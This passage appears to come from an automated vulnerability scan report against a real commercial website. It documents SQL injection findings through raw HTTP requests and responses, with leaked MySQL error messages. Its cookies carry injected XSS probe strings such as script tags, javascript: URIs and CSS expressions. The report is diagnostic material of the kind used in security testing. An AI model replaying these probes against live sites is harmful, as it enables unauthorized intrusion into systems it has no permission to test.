OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:12:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=if0mu7gmrjumeufk6atg5n1hj7; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/project_dynamic_page_updated.php was not found on this server.</p>

1.80. http://www.insideup.com/ppc/leadflow/bulo00/project_dynamic_page_updated.php [group parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project_dynamic_page_updated.php

Issue detail

The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00'&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:12:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pevj6lq6gt9hrmn4mqu7qotdd0; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00'&template=3' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php?ca' at line 5

Request 2

POST /ppc/leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00''&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:12:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=u8ho3pr4se1qheib2bonlakn37; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/project_dynamic_page_updated.php was not found on this server.</p>

1.81. http://www.insideup.com/ppc/leadflow/bulo00/project_dynamic_page_updated.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project_dynamic_page_updated.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&templ/1'ate=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 898

subcategoryId=30005&catId=30005&iusrc=iupsc+&attributeId_429=2789__Commercial+mortgage+loan+(this+answer+redirects+to+our+commercial+mortgages+page)&attributeId_438=2845__Yes+-+we+accept+Visa+and%2for
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:22:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1diac77cv0i6fnh2v5nejach66; path=/
Content-Length: 2502
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
flow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&templ/1'ate=3' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&templ/1'ate=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ate=3' OR prj.project_page_url = 'leadflow/bulo00/project_dynamic_page_updated.p' at line 5

Request 2

POST /ppc/leadflow/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&templ/1''ate=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 